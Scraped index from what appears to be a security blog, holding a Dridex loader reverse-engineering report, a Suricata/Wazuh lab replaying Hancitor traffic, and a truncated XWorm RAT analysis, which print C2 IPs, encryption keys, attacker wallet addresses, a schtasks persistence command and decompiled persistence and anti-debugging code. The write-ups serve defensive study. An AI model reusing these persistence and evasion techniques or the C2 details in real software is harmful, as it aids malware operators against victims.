needed APIs at runtime using CRC32 hashing XOR-ed with 0x38BA5C7B, and calls them indirectly via int3/retn with a registered vectored exception handler — neutralizing debugger breakpoints in the process. Embedded strings are encrypted with RC4 using a 40-byte reversed key. After passing anti-VM and execution delay checks, it connects to four hardcoded C2 servers to download additional modules via InternetConnectW and InternetReadFile.\nInitial Analysis # Field Value Type DridexLoader Payload: 32-bit DLL File Name malware.dll File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows File Size 249856 bytes MD5 df1b0f2d8e1c9ff27a9b0eb50d0967ef SHA256 f9495e968f9a1610c0cf9383053e5b5696ecc85ca3ca2a338c24c7204cc93881 The binary was identified by CAPA as DridexLoader Payload and matched the YARA rule HeavensGate — indicating use of the Heaven\u0026rsquo;s Gate technique to switch from 32-bit to 64-bit mode at runtime.\nImports # Only two static imports were found:\n1OutputDebugStringA 2Sleep Exports # 1.text:0x00009D70 .rdata:0x0003AB08 DllRegisterServer Sections # The .rdata section showed unusually high entropy of 7.761, suggesting compressed or encrypted data. The .text section had entropy of 6.529.\nCAPEv2 Sandbox # The anti-VM functionality limited sandbox visibility, but CAPEv2 successfully extracted the malware configuration — revealing four C2 servers and the RC4 encryption key used for communication:\n1C2: 192.46.210.220:443 2 143.244.140.214:808 3 45.77.0.96:6891 4 185.56.219.47:8116 5RC4: 9fRysqcdPgZffBlroqJaZHyCvLvD6BUV Static Analysis # Resolving API # Function mw_API_resolve is called twice from the entry point function, both times with the same value for the first parameters. For the second call, the return value is called as a function, so we know that it must be dynamically resolving API through the hashes from its parameters. Since both calls share the same value for the first parameter but different values for the second one, we can assume that the first hash corresponds to a library name, and the second one corresponds to the name of the target API in that library.\n1BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) 2{ 3 v7[0] = v3; 4 v4 = hinstDLL; 5 sub_607980(v7, 0); 6 dword_62B1D4 = mw_API_resolve(-1590620315, 497732535); 7 if ( !byte_62B028 ) 8 { 9 if ( hinstDLL != NtCurrentTeb()-\u0026gt;ProcessEnvironmentBlock ) 10 byte_62B265 = 1; 11 if ( !byte_62B265 ) 12 { 13 mw_anti_vm(v7[0]); 14 dword_62B1D4(0); 15 } 16//...[snip]... 17 || (byte_62B004 = 0, (v6 = mw_API_resolve(-1590620315, -1462740277)) != 0) 18 \u0026amp;\u0026amp; v6(0, 0, sub_5F5100, hinstDLL, 0, 0) ) Investigation of cross-references (xrefs) to sub_6015C0 reveals that this function is called multiple times throughout the malware\u0026rsquo;s code, each time with different hash values as parameters. which confirms that our assumption about tecnhique dynamic API resolving The subroutine first starts with passing the DLL hash to the functions sub_686C50 and sub_687564. The return value and the API hash are then passed into sub_6067C8 as parameters. From this, we can assume the first two functions retrieve the base of the DLL corresponding to the DLL hash, and this base address is passed to the last function with the API hash to resolve the API.\n1int __stdcall mw_API_resolve(int maybe_DLL_hash, int maybe_API_hash) 2{ 3//...[snip]... 4v6 = sub_607564(maybe_DLL_hash, maybe_DLL_hash); 5 if ( !v6 ) 6 { 7 if ( sub_606C50(maybe_DLL_hash) ) 8 v6 = sub_607564(maybe_DLL_hash, maybe_DLL_hash); 9 } 10 if ( !v6 ) 11 return 0; 12 else 13 return sub_6067C8(v6, maybe_API_hash, v7, v8); 14} Hashing algorithm # sub_607564 is the hashing algorithm. The target API hash is XOR-ed with 0x38BA5C7B before being compared to the hash of each API name\n1void *__userpurge sub_607564@\u0026lt;eax\u0026gt;(int maybe_DLL_hash@\u0026lt;eax\u0026gt;, int maybe_API_hash) 2{ 3//...[snip]... 4 if ( dll_hash == (sub_61D620(v43, v16) ^ 0x38BA5C7B) ) 5//...[snip]... Depend on constant values being loaded or used in the program can pick out the algorithm.\nAmong the three constants being used in this function, one stands out with the repetition of the value 0x0EDB8832, which is typically used in the CRC32 hashing algorithm. So, sub_69D620 is a function to generate a CRC32 hash from a given string, and the API hashing algorithm of DRIDEX boils down to XOR-ing the CRC32 hash of API/DLL names with 0x38BA5C7B. 1.rdata:0062A2F0 xmmword_62A2F0 xmmword 3000000020000000100000000h 2.rdata:0062A2F0 ; DATA XREF: sub_61D620+11↑r 3.rdata:0062A300 xmmword_62A300 xmmword 1000000010000000100000001h 4.rdata:0062A300 ; DATA XREF: sub_61D620+2D↑r 5.rdata:0062A300 ; sub_61D620+9A↑r ... 6.rdata:0062A310 xmmword_62A310 xmmword 0EDB88320EDB88320EDB88320EDB88320h I used hashdb to look up the hashes in the sample. The hash 0x1DAACBB7 corresponds correctly to the ExitProcess API, which confirms that our assumption about the hashing algorithm is correct. C2 Communication # To identify all resolved APIs without manually tracing each hash, I wrote an IDAPython script that extracted all push arguments preceding calls to mw_API_and_DLL_resolve and saved them to a file. Each hash was then resolved against the hashdb API using the XOR key 0x38BA5C7B identified earlier:\n1import requests 2 3filename = r\u0026#34;C:\\Users\\f\\Desktop\\calls.txt\u0026#34; 4xor_key = 0x38BA5C7B 5 6unique_args = {} 7 8with open(filename, \u0026#34;r\u0026#34;) as file: 9 for line in file: 10 parts = line.split() 11 if len(parts) \u0026gt;= 3: 12 addr, dll_h, api_h = parts[0], int(parts[1]), int(parts[2]) 13 for h in [dll_h, api_h]: 14 if h not in unique_args: 15 unique_args[h] = set() 16 unique_args[h].add(addr) 17 18for hash_value in sorted(unique_args): 19 response = requests.get( 20 f\u0026#34;https://hashdb.openanalysis.net/hash/crc32/{str(hash_value ^ xor_key)}\u0026#34; 21 ) 22 if response.status_code == 200: 23 data = response.json() 24 if data.get(\u0026#34;hashes\u0026#34;): 25 name = data[\u0026#34;hashes\u0026#34;][0][\u0026#34;string\u0026#34;][\u0026#34;string\u0026#34;] 26 addrs = \u0026#34;, \u0026#34;.join(sorted(unique_args[hash_value])) 27 print(f\u0026#34;Found: {name} @ {addrs}\u0026#34;) The full WinINet call chain was recovered, confirming a complete HTTP-based C2 communication stack:\n1Found: InternetOpenA @ 0x00623238 2Found: InternetConnectW @ 0x0062346C 3Found: HttpOpenRequestW @ 0x00623508 4Found: HttpSendRequestW @ 0x0062388E 5Found: InternetReadFile @ 0x00623AD6 6Found: HttpQueryInfoW @ 0x0062392F, 0x00623985, 0x006239DE 7Found: InternetSetOptionW @ 0x006235FF, 0x00623622, 0x0062367B 8Found: InternetQueryOptionW @ 0x0062364D 9Found: InternetCloseHandle @ 0x0062327D, 0x0062330D, ... The function responsible for C2 connection is at 0x00623370 (InternetConnectW), and the module download function is at 0x00623820 (InternetReadFile).\nResolved API Analysis # The full resolved API list revealed several additional capability clusters beyond the C2 stack.\nProcess injection — a complete injection toolkit using Nt* functions directly from NTDLL to bypass higher-level API monitoring: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtReadVirtualMemory, NtProtectVirtualMemory, NtMapViewOfSection, NtUnmapViewOfSection, NtCreateSection, RtlCreateUserThread, NtQueueApcThread, NtResumeThread.\nRegistry persistence — RegCreateKeyExW, RegSetValueExA, RegLoadKeyW, RegUnLoadKeyW, RegOpenKeyExW, RegQueryValueExW/A indicate reading and writing of registry keys including hive load/unload operations — NTUSER.DAT was also present in the decrypted strings.\nCryptography — CryptAcquireContextW, CryptGenRandom, CryptCreateHash, CryptHashData, CryptGetHashParam, CryptDestroyHash indicate use of the Windows CryptoAPI for key generation or data hashing separate from the RC4 string encryption.\nProcess and memory enumeration — K32GetProcessImageFileNameW, K32EnumProcessModulesEx, K32GetModuleBaseNameW, NtQuerySystemInformation, NtQueryVirtualMemory, CreateToolhelp32Snapshot, Thread32First, Thread32Next point to thorough process and module scanning consistent with injection target selection.\nInter-process atom communication — GlobalAddAtomW, GlobalGetAtomNameA/W, GlobalDeleteAtom are used for stealthy inter-process signaling without named pipes or sockets.\nCOM usage — CoCreateInstance, CoInitializeEx, CoUninitialize suggest use of COM objects, possibly for IWebBrowser2-based form grabbing consistent with Dridex\u0026rsquo;s known banking capabilities.\nException Handler # The sample does not use the call instruction to call APIs. Instead, the malware uses a combination of int3 and retn instructions to call its Windows APIs after dynamically resolving them. The function sub_607980 dynamically resolves RtlAddVectoredExceptionHandler and calls it to register sub_607D40 as a vectored exception handler. This means that when the program encounters an int3 instruction, sub_607D40 is invoked by the kernel to handle the interrupt and transfer control to the API stored in eax.\n1LABEL_9: 2 v8 = mw_DLL_base(0x588AB3EA, 0x588AB3EA); 3 if ( !v8 \u0026amp;\u0026amp; sub_606C50(NTDLL_DLL) ) 4 v8 = mw_DLL_base(0x588AB3EA, 0x588AB3EA); // NTDLL.DLL 5 if ( v8 ) 6 v9 = mw_API_resolve(v8, 0x82115E73, v10, v11);// RtlAddVectoredExceptionHandler 7 else 8 v9 = nullptr; 9LABEL_12: 10 n787139894 = sub_607A60(v9); 11 byte_62B26C = 0; 12 } sub_607D40 handles three exception codes:\nNTSTATUS Code Symbolic Name Description 0xC0000005 STATUS_ACCESS_VIOLATION Invalid memory access 0xC00000FD STATUS_STACK_OVERFLOW Stack exhaustion 0xC0000374 STATUS_HEAP_CORRUPTION Heap metadata corruption 1int __stdcall sub_607D40(int **a1) 2{ 3 v1 = **a1; 4 if ( v1 == 0xC0000005 || v1 == 0xC00000FD || v1 == 0xC0000374 ) 5 { 6 //...[snip]... 7 kernel32_base = mw_DLL_base(0xA1310F65, 0xA1310F65); 8 if ( !kernel32_base ) 9 { 10 if ( sub_606C50(0xA1310F65) ) 11 kernel32_base = mw_DLL_base(0xA1310F65, 0xA1310F65);// KERNEL32.DLL 12 } 13 if ( kernel32_base ) 14 { 15 TreminateProcess = mw_API_resolve(kernel32_base, 0x93FAE3F6, v7, v8);// TreminateProcess 16//...[snip]... 17 __debugbreak(); 18 return TreminateProcess; For these exceptions, the handler dynamically resolves an API using module hash 0xA1310F65(KERNEL32.DLL) and function hash 0x93FAE3F6(TerminateProcess)\nFor STATUS_BREAKPOINT (0x80000003), the handler manually patches the exception context record, advancing EIP past the breakpoint and adjusting the stack before returning EXCEPTION_CONTINUE_EXECUTION (-1):\n1//...[snip]... 2 else if ( v1 = 0x80000003 ) 3 { 4 ++a1[1][46]; 5 a1[1][49] -= 4; 6 *a1[1][49] = a1[1][46] + 1; 7 a1[1][49] -= 4; 8 *a1[1][49] = a1[1][44]; 9 return -1; 10 } This is a known anti-debugging technique: by silently swallowing STATUS_BREAKPOINT, DRIDEX neutralizes software breakpoints set by a debugger, allowing execution to continue transparently from the next instruction.\nAnti-VM # The callback function sub_5F5100 called mw_anti_vm(), resolved two APIs via hash, then performed an unconditional jmp to a resolved address — consistent with a stager or loader pattern that transfers execution to unpacked code:\n1void __cdecl sub_5F5100(int a1) 2{ 3 int v1; // [esp+0h] [ebp-8h] 4 5 mw_anti_vm(); 6 v1 = mw_API_resolve(-1590620315, -169236058); 7 mw_API_resolve(-1590620315, -1206567270); 8 __asm { jmp [ebp+var_8] } 9} mw_anti_vm() implemented an execution delay loop that ran up to 199,999,100 iterations, calling OutputDebugStringA and Sleep(0xA) repeatedly — a common sandbox evasion technique designed to exhaust sandbox time limits:\n1while ( 1 ) 2{ 3 sub_615CB0(20, 80); 4 OutputDebugStringA(lpOutputString[0]); 5 Sleep(0xAu); 6 sub_610B10(lpOutputString); 7 if ( ++v1 \u0026gt;= 199999100 ) 8 break; 9 while ( v1 \u0026gt;= 4987 ) 10 { 11 if ( ++v1 \u0026gt;= 199999100 ) 12 { 13 OutputDebugStringA(v75); 14 goto LABEL_9; 15 } 16 } Strings Encryption # capa identified RC4 encryption capabilities in the binary:\n1encrypt data using RC4 KSA 2namespace data-manipulation/encryption/rc4 3scope function 4matches 0x61E5D0 5 6encrypt data using RC4 PRGA 7namespace data-manipulation/encryption/rc4 8scope function 9matches 0x61E5D0 I renamed 0x61E5D0 to mw_RC4. The signed int a2 parameter may indicates the key length:\n1void __fastcall mw_RC4(int a1, signed int a2, int a3, int a4, int a5, int (__stdcall *a6)(int, int), int a7) Tracing the callers of mw_RC4 confirmed the key length is 40 bytes — passed as the second parameter. Before the key is applied, sub_61E780 performs a byte-reversal on the key bytes:\nFollowing the call chain to identify the encrypted data source, I found that sub_607B30 is called with \u0026amp;unk_629BC0 as the data parameter:\n1_WORD **__fastcall sub_5FAC00(_WORD **a1, int a2) 2{ 3 sub_607B30(a1, \u0026amp;unk_629BC0, a2); 4 return a1; 5} The RC4 key (before reversal) is:\n1D5BBC53E129470925A59E6EA6AA9E6C48BC48D5093D51CD433884126BAE4A81560E7B19148933CDB After accounting for the byte-reversal and decrypting, the plaintext strings from 0x629BC0 were recovered:\n1Program Manager 2Progman 3AdvApi32~PsApi~shlwapi~shell32~WinInet 4/run /tn \u0026#34;%ws\u0026#34; 5\u0026#34;%ws\u0026#34; /grant:r \u0026#34;%ws\u0026#34;:F 6\\NTUSER.DAT 7winsxs 8x86_* 9amd64_* 10*.exe 11\\Sessions\\%d\\BaseNamedObjects\\ These strings reveal the malware\u0026rsquo;s targets and internal logic: AdvApi32~PsApi~shlwapi~shell32~WinInet is a tilde-delimited list of DLLs the malware dynamically resolves, Program Manager / Progman indicate process or window targeting, and the schtasks /run /tn \u0026quot;%ws\u0026quot; template suggests scheduled task abuse for execution or persistence.\nIOCs # Files\n- malware.dll\n- MD5: df1b0f2d8e1c9ff27a9b0eb50d0967ef\n- SHA256: f9495e968f9a1610c0cf9383053e5b5696ecc85ca3ca2a338c24c7204cc93881\nNetwork\n- C2: 192.46.210.220:443\n- C2: 143.244.140.214:808\n- C2: 45.77.0.96:6891\n- C2: 185.56.219.47:8116\nEncryption\n- Algorithm: RC4\n- Key (pre-reversal): D5BBC53E129470925A59E6EA6AA9E6C48BC48D5093D51CD433884126BAE4A81560E7B19148933CDB\n- CAPEv2 key: 9fRysqcdPgZffBlroqJaZHyCvLvD6BUV\nAttack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Load([malware.dll LoadedDllEntryPoint]):::input --\u003e APIResolve[Dynamic API ResolutionCRC32 XOR 0x38BA5C7B]:::exec subgraph Evasion [Evasion] APIResolve --\u003e VEH[Register VEHRtlAddVectoredExceptionHandler]:::exec VEH --\u003e Int3[int3 + retnIndirect API Calls]:::exec Int3 --\u003e AntiVM{Anti-VMExecution Delay Loop199,999,100 iterations}:::check AntiVM -.-\u003e|Timeout / VM| Exit[Exit]:::term AntiVM -- Pass --\u003e HeavensGate[Heaven's Gate32-bit → 64-bit switch]:::exec end subgraph Init [Initialization] HeavensGate --\u003e RC4[RC4 String Decryption40-byte reversed key]:::exec RC4 --\u003e Strings[\"Program Manager, ProgmanAdvApi32~PsApi~shlwapi~shell32~WinInetNTUSER.DAT, schtasks /run /tn\"]:::exec Strings --\u003e Loader[sub_5F5100Resolve APIs + jmp to unpacked code]:::exec end subgraph Persistence [Persistence] Loader --\u003e Reg[Registry R/WRegCreateKeyExW / RegSetValueExA]:::exec Loader --\u003e Hive[Offline Hive ManipulationRegLoadKeyW / NTUSER.DAT]:::exec Loader --\u003e Task[Scheduled Taskschtasks /run /tn]:::exec end subgraph Injection [Process Injection] Loader --\u003e Enum[Process EnumerationToolhelp32 / NtQuerySystemInformation]:::exec Enum --\u003e Target[Select Injection Target]:::exec Target --\u003e Alloc[NtAllocateVirtualMemoryNtWriteVirtualMemory]:::exec Alloc --\u003e Protect[NtProtectVirtualMemoryNtMapViewOfSection]:::exec Protect --\u003e Thread[RtlCreateUserThreadNtQueueApcThread / NtResumeThread]:::exec end subgraph C2 [C2 Communication] Thread --\u003e IOpen[InternetOpenA]:::exec IOpen --\u003e IConnect[InternetConnectW0x00623370]:::exec IConnect --\u003e IRequest[HttpOpenRequestWHttpSendRequestW]:::exec IRequest --\u003e IRead[InternetReadFile0x00623820Download modules]:::exec IRead --\u003e IP1((192.46.210.220:443)):::exec IRead --\u003e IP2((143.244.140.214:808)):::exec IRead --\u003e IP3((45.77.0.96:6891)):::exec IRead --\u003e IP4((185.56.219.47:8116)):::exec end subgraph Banking [Banking Capabilities] Thread --\u003e COM[CoCreateInstanceIWebBrowser2 Form Grabbing]:::exec Thread --\u003e Atoms[GlobalAddAtomWInter-process Signaling]:::exec Thread --\u003e Crypt[CryptoAPICryptGenRandom / CryptHashData]:::exec end ","date":"March 3, 2026","externalUrl":null,"permalink":"/investigations/cdef-tealer/","section":"","summary":"A Dridex loader DLL that dynamically resolves APIs via CRC32 hashing, uses int3/retn as an indirect call mechanism to evade analysis, decrypts embedded strings with RC4, and connects to four hardcoded C2 servers over HTTPS to download additional modules.","title":"CDEF-$tealer","type":"investigations"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/crc32/","section":"Tags","summary":"","title":"CRC32","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/dll/","section":"Tags","summary":"","title":"DLL","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/dridex/","section":"Tags","summary":"","title":"Dridex","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/dynamic-api-resolution/","section":"Tags","summary":"","title":"Dynamic API Resolution","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/hashdb/","section":"Tags","summary":"","title":"HashDB","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/heavens-gate/","section":"Tags","summary":"","title":"Heaven's Gate","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/indirect-calls/","section":"Tags","summary":"","title":"Indirect Calls","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/loader/","section":"Tags","summary":"","title":"Loader","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/pe/","section":"Tags","summary":"","title":"PE","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/rc4/","section":"Tags","summary":"","title":"RC4","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/vectored-exception-handling/","section":"Tags","summary":"","title":"Vectored Exception Handling","type":"tags"},{"content":" Objective # Replay a PCAP file through Suricata integrated with Wazuh to practice network-based threat detection, analyze generated alerts, reconstruct the infection chain, and map findings to MITRE ATT\u0026amp;CK.\nPCAP Overview # The PCAP file contains network traffic captured from an infected Windows 7 (64-bit) host on an internal network.\nTimeline:\n- Start: Feb 8, 2021 @ 17:59:18\n- End: Feb 8, 2021 @ 18:18:18\n- Duration: ~19 minutes\nHosts involved:\nHost Type Role 10.2.8.101 Internal Infected Windows 7 victim 10.2.8.2 Internal Gateway / DNS — target of lateral movement 8.208.10.147 External roanokemortgages.com — payload delivery 213.5.229.12 External satursed.com — Hancitor C2 198.211.10.238 External Cobalt Strike / Meterpreter / Dridex C2 185.100.65.29 External Ficker Stealer C2 162.241.149.195 External Phishing / Let\u0026rsquo;s Encrypt IDN 54.235.147.252 External api.ipify.org — IP lookup Victim OS: Windows 7 64-bit, identified via User-Agent strings:\n- Windows NT 6.1; Win64; x64; Trident/7.0 (Internet Explorer 11)\n- Windows NT 6.1; WOW64; Trident/5.0 (Internet Explorer 9)\nWhat Suricata Detected # Suricata generated 423 alerts forwarded to Wazuh via eve.json. All alerts appeared under Wazuh rule.id: 86601 in the Security Events dashboard.\nSuricata Signature IDs triggered:\nSignature ID Rule Name Category 2034127 ET MALWARE Tordal/Hancitor/Chanitor Checkin Malware C2 2033713 ET MALWARE Cobalt Strike Beacon Observed Malware C2 2028765 ET JA3 Hash - [Abuse.ch] Possible Dridex Malware C2 2035651 ET MALWARE Meterpreter or Other Reverse Shell SSL Cert Malware C2 2031074 ET MALWARE Win32/Ficker Stealer Activity Malware 2014819 ET INFO Packed Executable Download Execution 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad Hunting 2024227 ET PHISHING Lets Encrypt Free SSL Cert with IDN/Punycode Phishing 2047702 ET INFO External IP Lookup Domain (ipify.org) in DNS Reconnaissance 2029622 ET INFO External IP Lookup (ipify.org) Reconnaissance 2067085 ET INFO NTLM Session Setup Request - Negotiate Lateral Movement Infection Chain Reconstruction # By correlating alert timestamps, a complete infection chain is visible:\nPayload Delivery\n1ET INFO Packed Executable Download 2→ src: 10.2.8.101 → dest: 8.208.10.147 (roanokemortgages.com) 3→ File: /6lhjgfdghj.exe (42,405 bytes — application/octet-stream) 4→ Hancitor dropper delivered over HTTP 5→ MITRE T1105: Ingress Tool Transfer 1\u0026#34;http\u0026#34;: { 2 \u0026#34;hostname\u0026#34;: \u0026#34;roanokemortgages.com\u0026#34;, 3 \u0026#34;protocol\u0026#34;: \u0026#34;HTTP/1.1\u0026#34;, 4 \u0026#34;http_method\u0026#34;: \u0026#34;GET\u0026#34;, 5 \u0026#34;http_content_type\u0026#34;: \u0026#34;application/octet-stream\u0026#34;, 6 \u0026#34;length\u0026#34;: \u0026#34;42405\u0026#34;, 7 \u0026#34;url\u0026#34;: \u0026#34;/6lhjgfdghj.exe\u0026#34;, 8 \u0026#34;http_user_agent\u0026#34;: \u0026#34;Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\u0026#34;, 9 \u0026#34;status\u0026#34;: \u0026#34;200\u0026#34; 10 }, 11 \u0026#34;files\u0026#34;: [ 12 { 13 \u0026#34;filename\u0026#34;: \u0026#34;/6lhjgfdghj.exe\u0026#34;, 14 \u0026#34;size\u0026#34;: 42405, 15 \u0026#34;stored\u0026#34;: false, 16 \u0026#34;state\u0026#34;: \u0026#34;UNKNOWN\u0026#34;, 17 \u0026#34;tx_id\u0026#34;: 2, 18 \u0026#34;gaps\u0026#34;: false 19 } Reconnaissance\n1ET INFO External IP Lookup Domain (ipify.org) in DNS Lookup 2ET INFO External IP Lookup (ipify.org) 3→ src: 10.2.8.101 → dest: 54.235.147.252 (api.ipify.org) 4→ Malware checks victim\u0026#39;s external IP — standard post-infection behavior 5→ MITRE T1590: Gather Victim Network Information Hancitor C2 Check-in\n1ET MALWARE Tordal/Hancitor/Chanitor Checkin 2ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad 3→ src: 10.2.8.101 → dest: 213.5.229.12 (satursed.com) 4→ Hancitor dropper reports to C2, receives next-stage payload instructions 5→ MITRE T1071.001: Application Layer Protocol: Web Protocols Secondary Payload C2\n1ET MALWARE Cobalt Strike Beacon Observed 2ET MALWARE Meterpreter or Other Reverse Shell SSL Cert 3ET HUNTING Suspicious Empty SSL Certificate — Cobalt Strike 4ET JA3 Hash - [Abuse.ch] Possible Dridex 5→ src: 10.2.8.101 → dest: 198.211.10.238 6→ Cobalt Strike beacon and Dridex banking trojan establish C2 over TLS 7→ MITRE T1071.001, T1573.001: Encrypted Channel Infostealer Activity\n1ET MALWARE Win32/Ficker Stealer Activity 2→ src: 10.2.8.101 → dest: 185.100.65.29 3→ Ficker Stealer active — targets browsers, credentials, crypto wallets 4→ MITRE T1041: Exfiltration Over C2 Channel Lateral Movement\n1ET INFO NTLM Session Setup Request - Negotiate 2→ src: 10.2.8.101 → dest: 10.2.8.2 (internal gateway) 3→ NTLM authentication attempt against internal host via SMB 4→ MITRE T1550.002: Pass the Hash / T1021.002: SMB Phishing Infrastructure\n1ET PHISHING Lets Encrypt Free SSL Cert with IDN/Punycode Domain 2→ dest: 162.241.149.195 3→ Contact with phishing domain using lookalike certificate 4→ MITRE T1566: Phishing Detection Gap # All 423 Suricata alerts arrived in Wazuh at rule.level 3 — informational severity. This is a default integration gap: Wazuh rule 86601 maps all Suricata alerts to level 3 regardless of the underlying Suricata severity.\nResponse # To escalate Cobalt Strike detections to critical severity, a custom rule was added to /var/ossec/etc/rules/local_rules.xml:\n1\u0026lt;group name=\u0026#34;suricata,\u0026#34;\u0026gt; 2 \u0026lt;rule id=\u0026#34;100002\u0026#34; level=\u0026#34;12\u0026#34;\u0026gt; 3 \u0026lt;if_sid\u0026gt;86601\u0026lt;/if_sid\u0026gt; 4 \u0026lt;field name=\u0026#34;data.alert.signature\u0026#34;\u0026gt;Cobalt Strike\u0026lt;/field\u0026gt; 5 \u0026lt;description\u0026gt;Suricata: Cobalt Strike C2 Beacon — Critical\u0026lt;/description\u0026gt; 6 \u0026lt;mitre\u0026gt; 7 \u0026lt;id\u0026gt;T1071.001\u0026lt;/id\u0026gt; 8 \u0026lt;/mitre\u0026gt; 9 \u0026lt;/rule\u0026gt; 10\u0026lt;/group\u0026gt; The recommended response would be:\n- Block all identified external C2 IPs at the perimeter firewall\n- Isolate the infected host (10.2.8.101) from the network immediately\n- Search for the dropper binary (6lhjgfdghj.exe) across all endpoints\n- Reset credentials for all accounts active on the infected host\n- Hunt for Cobalt Strike beacon artifacts in memory and persistence mechanisms\nConclusion # Replaying a PCAP through Suricata integrated with Wazuh produced 423 alerts covering a complete infection chain — from initial payload delivery through C2 communication, credential theft, and lateral movement attempts.\nKey takeaways:\n- Hancitor acted as initial dropper, deploying Cobalt Strike, Dridex, and Ficker Stealer\n- Suricata + Wazuh provides full visibility into multi-stage malware behavior\n- Default Wazuh integration sets all Suricata alerts at level 3 — custom rules required for critical escalation\n- Correlating timestamps across 11 signature IDs revealed a complete 7-stage infection chain\n","date":"March 2, 2026","externalUrl":null,"permalink":"/blue_team/wazuh+suricata-malware-traffic/","section":"","summary":"Replayed a malicious PCAP file containing Hancitor dropper traffic that deployed Cobalt Strike, Dridex, and Ficker Stealer. Analyzed 423 Suricata alerts in Wazuh, reconstructed the full infection chain, and mapped findings to MITRE ATT\u0026CK.","title":"Wazuh + Suricata: Malware traffic","type":"blue_team"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/.net/","section":"Tags","summary":"","title":".NET","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-28 TL;DR # A .NET XWorm RAT detected by Capa rules. It drops a copy of itself as WmiPrvSE.exe to masquerade as a legitimate Windows process, establishes triple persistence via scheduled task, startup folder shortcut, and registry Run key, bypasses Windows Defender via exclusion rules, implements a low-level keylogger via SetWindowsHookEx, hijacks clipboard content targeting Bitcoin and Ethereum wallet addresses, and communicates with three C2 servers over TCP using AES-ECB encrypted payloads.\nInitial Analysis # 1xworm.exe: PE32 executable (GUI) Intel i386 Mono/.Net assembly, 3 sections 2SHA256: ced525930c76834184b4e194077c8c4e7342b3323544365b714943519a0f92af 3MD5: 7c7aff561f11d16a6ec8a999a2b8cdad The binary was identified as XWorm Payload by a Capa rule.\nSandbox Analysis # Seconds after execution the sample dropped a copy of itself as WmiPrvSE.exe in %APPDATA% — impersonating the legitimate WMI Provider Host process to blend in with normal system activity.\nAn encrypted configuration file xworm.exe.config was created in %TEMP%:\nThe decrypted configuration revealed:\n1C2 Servers: 185.117.250.169, 66.175.239.149, 185.117.249.43 2Port: 7000 3Key: 8xTJ0EKPuiQsJVaT 4USB copy: USB.exe The config also contained hardcoded cryptocurrency wallet addresses used for clipboard hijacking:\n1Bitcoin: bc1q2a4jgxmvslng5khwvzkt9pechms20ghff42s5g 2Ethereum: 0x10cE3E5678f40f0B94A2fB5003f04012ecA407C5 Persistence # Scheduled Task # Created a scheduled task WmiPrvSE that executes the dropped binary every minute with highest privileges:\n1schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 2 /tn \u0026#34;WmiPrvSE\u0026#34; 3 /tr \u0026#34;C:\\Users\\admin\\AppData\\Roaming\\WmiPrvSE.exe\u0026#34; 1ProcessStartInfo processStartInfo = new ProcessStartInfo(\u0026#34;schtasks.exe\u0026#34;); 2processStartInfo.Arguments = string.Concat(new string[] 3{ 4 \u0026#34;/create /f /RL HIGHEST /sc minute /mo 1 /tn \\\u0026#34;\u0026#34;, 5 Path.GetFileNameWithoutExtension(NB2mi1VBTSN5U40DfEsDcrzgxWCrxt7i1yCoMW0Zb5dK9QwIjZ6W6wYeHriq.EB5J4sIzfH74BwfgRjacCtnEuNWFxu93z57nr4HrttTW5asXOhadv7pC7YFu), 6 \u0026#34;\\\u0026#34; /tr \\\u0026#34;\u0026#34;, text, \u0026#34;\\\u0026#34;\u0026#34; 7}); 8Process process = Process.Start(processStartInfo); Startup Folder # Created a .lnk shortcut in the Windows Startup folder to ensure execution on every user login:\n1C:\\Users\\%User%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup Run Registry Key # Set a registry Run key to execute WmiPrvSE.exe on user login:\n1HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WmiPrvSE Static Analysis # Encryption # Configuration data was encrypted using AES-ECB mode. The key was derived by computing an MD5 hash of a hardcoded string and copying the result twice into a 32-byte array:\n1RijndaelManaged rijndaelManaged = new RijndaelManaged(); 2MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider(); 3byte[] array = new byte[32]; 4byte[] sourceArray = md5CryptoServiceProvider.ComputeHash(ACX0qTJzEzq40qP5qFxb.wVkaAAeCf6BeWi8Flwtq(NB2mi1VBTSN5U40DfEsDcrzgxWCrxt7i1yCoMW0Zb5dK9QwIjZ6W6wYeHriq.DhMybcleyUJ8bZbaqtAkL3FTz6SQ840xELBsFWt9yekNCVYQ1WgRtjL1bTF3)); 5Array.Copy(sourceArray, 0, array, 0, 16); 6Array.Copy(sourceArray, 0, array, 15, 16); 7rijndaelManaged.Key = array; 